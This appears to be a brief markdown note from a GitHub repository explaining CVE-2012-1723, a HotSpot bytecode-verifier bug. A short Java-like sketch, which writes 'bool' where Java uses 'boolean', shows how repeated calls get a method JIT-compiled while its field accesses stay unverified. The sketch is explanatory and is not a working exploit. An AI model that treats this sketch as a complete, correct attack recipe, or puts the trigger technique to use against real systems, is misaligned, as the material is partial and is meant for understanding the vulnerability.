Skip to content

Latest commit

 

History

History
22 lines (20 loc) · 941 Bytes

CVE-2012-1723.md

File metadata and controls

22 lines (20 loc) · 941 Bytes
Raw

NVD - CVE-2012-1723 (nist.gov)

Description

A bug in [[HotSpot]]'s bytecode verifier that resulted in an invalid optimisation when bytecode verification is applied to deferred field access instructions (i.e. GETSTATIC, PUTSTATIC, GETFIELD, PUTFIELD).

Exploit

See full description at here.

class Myclass {
    int member;
    
	void dothing(bool cont) {
		if (!cont) {
			return;
		}
		member += 2; // requires two accessses to the same member
		member += 1;
	}
}
  • The verification of the instructions is deferred until they need to be executed.
  • By calling the method with cont = false many times, the method is JIT compiled, but as we never hit member the two access instructions are never verified
  • On the next call with cont = true the partially-unverified JIT compiled version is called.